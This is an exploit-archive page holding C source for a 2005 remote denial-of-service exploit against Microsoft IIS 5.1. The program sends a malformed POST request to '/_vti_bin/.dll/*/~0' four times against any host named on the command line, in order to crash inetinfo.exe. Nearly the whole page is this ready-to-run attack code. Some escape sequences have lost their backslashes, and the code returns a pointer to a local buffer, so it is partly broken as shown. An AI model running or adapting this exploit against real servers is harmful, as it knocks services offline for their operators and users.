[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)
# Published : 2005-12-19
# Author : Kozan
# Previous Title : BZFlag <= 2.0.4 (undelimited string) Denial of Service Exploit
# Next Title : MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)
/*****************************************************************
Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan
Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/
Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com
Vulnerable:
Microsoft? Internet Information Server? V5.1
Not vulnerable:
Microsoft? Internet Information Server? V5.0
Microsoft? Internet Information Server? V6.0
Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.
inetinfo.exe will be crashed after exploitation finished successfuly.
Usage: iis51dos.exe [Target Url or IP]
*****************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
char *HttpHeader(char *pszHost)
{
char szHeader[1000];
wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1rn"
"Content-Type: application/x-www-form-urlencodedrn"
"Host: %srn"
"Content-Length: 0rnrn"
, pszHost
);
return szHeader;
}
int main(int argc, char *argv[])
{
fprintf(stdout, "nnMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozann"
"Bug Discovered by: Inge Henriksenn"
"Exploit Coded by: Kozann"
"Credits to ATmaCA, Inge Henriksenn"
"www.spyinstructors.com - kozan@spyinstructors.comnn"
);
if( argc != 2 )
{
fprintf(stderr, "nnUsage:t%s [WebSiteUrl]nn", argv[0]);
return -1;
}
WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;
char szHeader[1000], szWebUrl[1000];
lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));
if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!n");
return -1;
}
sock = socket(AF_INET,SOCK_STREAM,0);
if( sock == -1 )
{
fprintf(stderr, "Socket error!n");
return -1;
}
if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!n");
return -1;
}
memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '�', 8);
fprintf(stdout, "Please wait while connecting...n");
if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!n");
closesocket(sock);
return -1;
}
fprintf(stdout, "Connected.nn");
fprintf(stdout, "Please wait while sending DoS request headers...nn");
for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...n", i+1);
if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!n", i+1);
closesocket(sock);
return -1;
}
fprintf(stdout, "%d. request sent.nn", i+1);
}
fprintf(stdout, "Operation completed...n");
closesocket(sock);
WSACleanup();
return 0;
}
// www.Syue.com [2005-12-19]